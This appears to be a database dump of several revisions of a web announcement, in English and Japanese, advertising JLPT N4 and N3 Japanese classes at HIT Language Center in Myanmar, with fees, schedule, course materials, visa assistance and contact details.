('announcement', 0, 62, 402, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK (Excluding Textbook fee)</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK (Excluding Textbook fee)</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 402, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解など！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 403, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK (Excluding Textbook fee)</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK (Excluding Textbook fee)</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 403, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK (教科書料金を除く)</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解など！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK (教科書料金を除く)</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 404, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK (Excluding Textbook fee)</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK (Excluding Textbook fee)</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 404, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK (教科書料金を除く)</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解など！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK (教科書料金を除く)</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img data-entity-uuid=\"462590b5-5d2f-431d-b50a-3efee62ade42\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v1_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"935c09db-5837-4a1f-8ef6-e63f9ec2e423\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v2.jpg\" data-align=\"center\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 405, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK (Excluding Textbook fee)</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK (Excluding Textbook fee)</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img data-entity-uuid=\"9a640b77-1f27-4315-aabb-ed1b6fa23767\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v1_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0e09f7e4-6346-480c-afcf-bd6e1e27ada1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v2_0.jpg\" data-align=\"center\">', '', 'full_html'),
('announcement', 0, 62, 405, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK (教科書料金を除く)</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解など！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK (教科書料金を除く)</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img data-entity-uuid=\"462590b5-5d2f-431d-b50a-3efee62ade42\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v1_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"935c09db-5837-4a1f-8ef6-e63f9ec2e423\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v2.jpg\" data-align=\"center\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 406, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Time: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK (Excluding Textbook fee)</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Time: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK (Excluding Textbook fee)</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img src=\"/sites/default/files/inline-images/v1_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a640b77-1f27-4315-aabb-ed1b6fa23767\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/v2_0.jpg\" data-align=\"center\" data-entity-uuid=\"0e09f7e4-6346-480c-afcf-bd6e1e27ada1\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 62, 406, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK (教科書料金を除く)</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解など！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK (教科書料金を除く)</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img data-entity-uuid=\"462590b5-5d2f-431d-b50a-3efee62ade42\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v1_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"935c09db-5837-4a1f-8ef6-e63f9ec2e423\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v2.jpg\" data-align=\"center\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 407, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: Monday, Tuesday, Wednesday (3 months)</li><li>Time: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK (Excluding Textbook fee)</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: Monday, Tuesday, Wednesday (3 months)</li><li>Time: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK (Excluding Textbook fee)</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img src=\"/sites/default/files/inline-images/v1_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a640b77-1f27-4315-aabb-ed1b6fa23767\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/v2_0.jpg\" data-align=\"center\" data-entity-uuid=\"0e09f7e4-6346-480c-afcf-bd6e1e27ada1\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 62, 407, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK (教科書料金を除く)</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解など！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK (教科書料金を除く)</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img data-entity-uuid=\"462590b5-5d2f-431d-b50a-3efee62ade42\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v1_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"935c09db-5837-4a1f-8ef6-e63f9ec2e423\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/v2.jpg\" data-align=\"center\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 408, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: Monday, Tuesday, Wednesday (3 months)</li><li>Time: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK (Excluding Textbook fee)</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: Monday, Tuesday, Wednesday (3 months)</li><li>Time: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK (Excluding Textbook fee)</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img src=\"/sites/default/files/inline-images/v1_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a640b77-1f27-4315-aabb-ed1b6fa23767\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/v2_0.jpg\" data-align=\"center\" data-entity-uuid=\"0e09f7e4-6346-480c-afcf-bd6e1e27ada1\" data-entity-type=\"file\">', '', 'full_html'),
